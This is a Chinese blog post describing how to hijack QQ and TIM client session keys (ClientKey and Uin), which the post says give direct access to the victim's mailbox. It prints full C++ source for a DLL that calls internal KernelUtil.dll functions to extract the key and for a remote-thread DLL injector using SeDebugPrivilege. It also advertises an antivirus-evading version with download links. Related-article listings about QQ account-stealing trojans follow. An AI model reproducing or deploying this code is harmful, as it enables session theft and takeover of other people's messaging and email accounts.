劫持 QQ / TIM 最新版本客户端 ClientKeys

已于 2023-12-22 21:22:58 修改
阅读量898 收藏 9
点赞数 8
分类专栏: QQ Clientkey 文章标签: 腾讯云 网络安全 c++
于 2023-12-22 20:20:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39190622/article/details/135154890
版权

简介

        最新版本的 QQ 9.7.20  / TIM 3.4.8 已经不能模拟网页快捷登录来截取数据,然而我们也经过多种流量测试,绝大部分的地区、环境、机器、网吧等都针对这种获取方式做了相应的措施或封禁,导致被彻底的和谐。

        上篇文章《通过 KernelUtil 截取 QQ/TIM 客户端 Clientkey 详细教程》我们也详细说明过利用QQ客户端加载的 KernelUtil.dll 定位函数来截取 Uin 跟 Clientkey,但是该种方法最大的缺点就是会被各种各样的安全软件与防毒软件提示、警报或拦截。

 KernelUtil.dll 截取数据实现代码:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
 
 
 
using namespace std;
 
char szUin[MAX_PATH] = { 0 };
char szClientkey[MAX_PATH] = { 0 };
 
 
 
BOOL DelTempFiles();
 
BOOL GetQQClientKeys();
 
static DWORD WINAPI MainProcess(LPVOID pParam);
 
 
// 清理缓存
 
BOOL DelTempFiles()
{
	// 清理 DNS 缓存
	ShellExecute(NULL, "open", "ipconfig.exe", "/flushdns", NULL, SW_HIDE);
 
	BOOL bResult = FALSE;
	BOOL bDone = FALSE;
 
	LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;
 
	DWORD  dwTrySize, dwEntrySize = 4096; // start buffer size
	HANDLE hCacheDir = NULL;
	DWORD  dwError = ERROR_INSUFFICIENT_BUFFER;
 
	do
	{
		switch (dwError)
		{
			// need a bigger buffer
		case ERROR_INSUFFICIENT_BUFFER:
			delete[] lpCacheEntry;
			lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
			lpCacheEntry->dwStructSize = dwEntrySize;
			dwTrySize = dwEntrySize;
			BOOL bSuccess;
			if (hCacheDir == NULL)
				bSuccess = (hCacheDir
					= FindFirstUrlCacheEntry(NULL, lpCacheEntry,
						&dwTrySize)) != NULL;
			else
				bSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);
 
			if (bSuccess)
				dwError = ERROR_SUCCESS;
			else
			{
				dwError = GetLastError();
				dwEntrySize = dwTrySize; // use new size returned
			}
			break;
 
			// we are done
		case ERROR_NO_MORE_ITEMS:
			bDone = TRUE;
			bResult = TRUE;
			break;
 
			// we have got an entry
		case ERROR_SUCCESS:
			// don't delete cookie entry
			if (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))
				DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
 
			// get ready for next entry
			dwTrySize = dwEntrySize;
			if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))
				dwError = ERROR_SUCCESS;
			else
			{
				dwError = GetLastError();
				dwEntrySize = dwTrySize; // use new size returned
			}
			break;
 
			// unknown error
		default:
			bDone = TRUE;
			break;
		}
 
		if (bDone)
		{
			delete[]lpCacheEntry;
			if (hCacheDir)
				FindCloseUrlCache(hCacheDir);
		}
	} while (!bDone);
 
	return TRUE;
}
 
 
 
BOOL GetQQClientKeys()
{
	// 清理缓存与DNS
	DelTempFiles();
 
	ZeroMemory(szUin, MAX_PATH);
	ZeroMemory(szClientkey, MAX_PATH);
 
	HMODULE hKernelUtil = GetModuleHandle("KernelUtil.dll");
	if (hKernelUtil == NULL)
	{
		OutputDebugStringA("Get KernelUtil Module failed \n");
		return FALSE;
	}
 
	ULONG fnGetSelfUin = (ULONG)GetProcAddress(GetModuleHandleA("KernelUtil"), "?GetSelfUin@Contact@Util@@YAKXZ");
	if (fnGetSelfUin == NULL)
	{
		OutputDebugStringA("Get GetSelfUin Function failed \n");
		return FALSE;
	}
 
	ULONG currentQQ = ((ULONG(__cdecl*)())fnGetSelfUin)();
	if (currentQQ == NULL)
	{
		OutputDebugStringA("Invoke GetSelfUin Function failed \n");
		return FALSE;
	}
 
	sprintf(szUin, "%u", currentQQ);
 
	PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");
	if (GetSignature == NULL)
	{
		OutputDebugStringA("Get GetSignature Function failed \n");
		return FALSE;
	}
	
	PVOID res = ((PVOID(*)(PVOID, const char*))GetSignature)(&ClientKey, "buf32ByteValueAddedSignature");
	if (res == NULL)
	{
		OutputDebugStringA("Invoke GetSignature Function failed \n");
		return FALSE;
	}
 
	sprintf(szClientkey, "%ws", ClientKey);
 
	return TRUE;
}
 
 
 
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		HANDLE hThread1;
		hThread1 = CreateThread(NULL, 0, MainProcess, NULL, 0, NULL);
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}
 
 
// 主线程模块
 
static DWORD WINAPI MainProcess(LPVOID pParam)
{
	if (GetQQClientKeys())
	{
		MessageBox(NULL, "获取数据成功。", "注意", NULL);
    }
	return 0;
}
// Main.cpp : 定义控制台应用程序的入口点。
//
 
#include "stdafx.h"
 
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
 
 
 
BOOL AdjustPrivileges();
 
BOOL injectDLL(TCHAR* DLLName, DWORD ProcessID);
 
 
 
 
// 唯一的应用程序对象
 
CWinApp theApp;
 
using namespace std;
 
 
 
BOOL AdjustPrivileges()
{
	HANDLE hToken = NULL;
	TOKEN_PRIVILEGES tp = { 0 };
	TOKEN_PRIVILEGES oldtp = { 0 };
	DWORD dwSize = sizeof(TOKEN_PRIVILEGES);
	LUID luid = { 0 };
 
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
		return FALSE;
	}
 
	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) {
		CloseHandle(hToken);
		return FALSE;
	}
 
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 
	/* Adjust Token Privileges */
	if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), &oldtp, &dwSize)) {
		CloseHandle(hToken);
		return FALSE;
	}
 
	// close handles
	CloseHandle(hToken);
	return TRUE;
}
 
 
 
BOOL injectDLL(TCHAR* DLLName, DWORD ProcessID)
{
	if (AdjustPrivileges())
	{
		HANDLE hOprocess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);
		if (hOprocess != NULL)
		{
			_TCHAR* pLibFileRemote = (_TCHAR*)VirtualAllocEx(hOprocess, NULL, 2 * strlen(DLLName) + 1, MEM_COMMIT, PAGE_READWRITE);
			if (pLibFileRemote != NULL)
			{
				if (!WriteProcessMemory(hOprocess, (void*)pLibFileRemote, DLLName, 2 * strlen(DLLName) + 1, NULL))
					return FALSE;
 
				//Get LoadLibraryW Address
				PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(_T("Kernel32")), "LoadLibraryA");
				if (pfnStartAddr != NULL)
				{
					HANDLE hRemote = CreateRemoteThread(hOprocess, NULL, 0, pfnStartAddr, (PVOID)pLibFileRemote, 0, NULL);
					if (hRemote != NULL)
					{
						CloseHandle(hRemote);
						CloseHandle(hOprocess);
 
						return TRUE;
					}
				}
			}
		}
		CloseHandle(hOprocess);
	}
	return FALSE;
}
 
 
 
int main()
{
	if (!injectDLL(“D:\\QQKey.dll”, 8888))
	{
		cout << "injectDLL To Target EXE Failed。\r\n" << endl;
	}
					
	system("pause");
 
    return 0;
}

        针对目前的情况我们只能再次寻求另外的途径来尝试突破封锁,下面我们将演示一种独特的方式来截取 Uin 跟 Clientkey,主要展示的是既不会被安全软件拦截也不会出现任何提示与警报

演示

 

        根据上图我们可以看出该种方法可以直接截取 64位 与 224位 Clientkey,并且某数字产品毫无提示或拦截。

返回的地址复制后在浏览器打开即可直达邮箱。 

为了防止和谐,详细代码与流程在这里暂不公布,有兴趣的话可以私信我。  

项目下载 

【csdn 下载】icon-default.png?t=N7T8https://download.youkuaiyun.com/download/qq_39190622/88653924

  
youkuaiyun.com (免积分下载)

【蓝奏云 下载】icon-default.png?t=N7T8https://wwrd.lanzoum.com/b04evqtej

蓝奏云(提取码:eh9v)  

【百度云 下载】icon-default.png?t=N7T8https://pan.baidu.com/s/12euHSTXxWl6XknlmpaKt0g

 百度云(提取码:wqau) 

木马伪装“刷单任务” 劫持QQ语音暗中盗号
Coisini的博客
06-12 2485
近日,360 QVM团队发现一类QQ盗号木马异常活跃。该木马通过QQ语音(QTalk)在网购刷单人群中大肆传播,并劫持Qtalk的文件隐蔽运行,通过弹出虚假的QQ语音登录框实施盗号。 此木马限于QTalk用户之间传播,淘宝刷单者常“驻扎”在QQ语音的房间内,等待接单。而不法分子则伪装为淘宝卖家,与刷单者加为QQ好友,并向其发送由木马伪装的“刷单任务”,伺机窃取刷单人群的QQ账号和密码。 360...
【C/C++劫持技术
02-28 8159
劫持 劫持的原理就是把目标函数的指针的指向修改为自定义函数的地址。 函数是放在内存中的代码区,所以劫持与代码区密切相关。 实现劫持需要使用detours。 detours detours是微软亚洲研究院出口的信息安全产品,主要用于劫持。这个工具使用C语言实现,所以是跨平台的。 detours根据函数指针改变函数的行为,可以拦截任何函数,即使操作系
劫持最新版 QQNT / QQ / TIM 客户端 QQKey、QQClientKey
最新发布
03-08
文章地址: https://blog.youkuaiyun.com/qq_39190622/article/details/135298346 截取QQNT、TIMQQ客户端QQKey、ClientKey并过免杀过360演示。
点击劫持
qq_29384013的博客
05-28 339
点击劫持是指通过劫持用户的点击,完成用户并不知情的操作。原理是通过iframe将目标操作页面放到劫持页面中,但是可见度设置为0,将背景图片展示给用户,即用户并不能看到该iframe,用户仅可看到并以为操作的是iframe的背景图片。 点击劫持的特点: 1.用户亲手操作 2.用户并不知情 3.可以获取用户资金或其他敏感信息 点击劫持防御: 1.通过js设置禁止内嵌...
动态链接库的静态链接导致程序的DLL劫持漏洞-借助QQ程序xGraphic32.dll描述
热门推荐
Less Is More
12-19 1万+
动态链接库的静态链接导致程序的DLL劫持漏洞 借助QQ程序xGraphic32.dll描述   不想啰嗦这么多了,直接开题。   一、       库 首先明确一下库的概念,库里存放的都是二进制编码。纵观编程技术的发展路线,可以看到一条清晰的发展脉络:代码>静态库>动态库。 假如我们要编写一个程序叫做Calc.exe,而现在有现成的库,库里面存放的是已经编译好的函数Add(),Sub
劫持 QQ / TIM 最新版本客户端 ClientKeys 演示工具下载
12-22
劫持 QQ / TIM 最新版本客户端 ClientKeys》 本文地址:https://blog.youkuaiyun.com/qq_39190622/article/details/135154890 最新版本QQ(9.7.20) / TIM(3.4.8) 已经不能模拟网页快捷登录来截取数据,然而我们...
劫持最新版 QQNT / QQ / TIM 客户端 ClientKeys 演示工具
12-29
本文地址:https://blog.youkuaiyun.com/qq_39190622/article/details/135298346针对 TX官网 最新发布的 QQNT 9.9.6 与 QQ 9.7.21 新版本客户端全面更新截取代码。大伙应该都知道自从 QQ 9.7.20 版本起就已经不能通过...
突破封锁:QQ/TIM客户端ClientKeys劫持新方法演示
资源摘要信息: "劫持 QQ / TIM 最新版本客户端 ClientKeys 演示工具" 本文所述工具提供了一种独特的方法来截取 QQTIM 客户端的 Uin 和 Clientkeys,目的是绕过安全软件和防毒软件的检测,从而实现对 QQTIM ...
新版 QQNT / QQ 截取 ClientKeys 新技术演示
资源摘要信息:"劫持最新版 QQNT / QQ / TIM 客户端 ClientKeys 演示工具" 本文主要介绍了如何在新版QQNT、QQTIM客户端中截取ClientKeys的相关技术方法和工具。首先,文章指出了由于TX官网对QQ版本的更新,原有的...
【大一期末项目】qqclienkey利用:基于qqclientkey的纯c++项目实践
SberC8的博客
05-19 2681
前言: 该项目主要是利用clientkey,对clientkey的获取不做深层探究,涉及到的多为基础知识。 学算法真的很有用,写代码少了很多bug,写算法题目时那种反复检查的思想对写代码有很大的提升。 qqclientkey,大概可以将其理解为qqweb端的临时密码。 关于qqclientkey,网上已经有很多前辈的研究和相关的文章,并且都通俗易懂较易理解,主要有两种方法,一种是内存中读取qqclientk...
即时通讯 qqclient
03-17
NULL 博文链接:https://yilong511.iteye.com/blog/555529
QQClient 客户端
01-10
一个简易的qq客户端、自娱自乐。支持和在线好友聊天。
QQclient.zip
05-03
C++、QT制作、QQ聊天工具、UI模仿;图标都是在百度上搜的,可能会跟QQUI有些差别,反正不喜欢的就自己换吧;去掉了自带边框,然后重写鼠标事件,实现窗口的移动;按下按钮可以切换界面,但是没有实现任何功能;
2023年最新版获取QQ Clientkey。
【Rainbow Network Technology co., LTD】
02-06 8185
2023年最新版获取QQ Clientkey方法
[转]hookQQ-API拦截QQ聊天记录-有图有码
weixin_34343000的博客
06-14 1185
大家先对QQ采用ollydbg调试QQ,分析出相关QQ内部函数//?GetMsgTime@Msg@Util@@YA_JPAUITXMsgPack@@@Z//?GetSelfUin@Contact@Util@@YAKXZ//?GetGroupName@Group@Util@@YA?AVCTXStringW@@K@Z//?GetDiscussName@Group@Util@@Y...
用PHP写的QQ Client,可以登陆、登出、收发消息、添加好友
binger819623的专栏
07-01 776
/***************************************QQ Client作者:Hackfan来源:http://blog.hackfan.net/2005.8.18QQ客户端,使用腾讯tqq.tencent.com:8000 HTTP接口参考文章:http://spaces.msn.com/members/mprogramer使用到的类:Advance
Java基于Socket实现简单QQ聊天详细教程
ye_ziya的博客
03-25 2582
Java基于Socket实现简单QQ聊天详细教程 一.引言 技术框架: 1.1 Java编程 1.2 Socket实现通信 1.3 多线程编程 1.4 JFrame 设计界面 实现思路 如图,基本架构就是设计一个服务端(端口确定)以及多个客户端(可随机可指定)。客户端之间并不直接通信,而是通过同一个服务端进行消息传输。 服务端:响应客户端连接,接受客户端消息,消息群发 客户端:通过服务器ip以及port连接对应服务器,发送消息,接受服务端消息,将消息通过界面展示 二.环境 操作系统:WindowsXP
域名遭到劫持怎么办?
qq_42169463的博客
05-09 4233
域名劫持是什么?由客户端发送域名请求给DNS,DNS通过遍历查询DNS数据库,来解析此域名对应的IP,然后反馈至浏览器客户端客户端通过IP与对方建立数据连接,这时,很关键的一环,就是DNS服务。简单说就是,域名劫持是互联网攻击的一种方式,通过攻击域名解析服务器(DNS),或伪造域名解析服务器(DNS)的方法,把目标网站域名解析到错误的地址,其效果就是对特定的网址不能访问或访问的是假网址。域名劫持...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Rainbow Technology

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值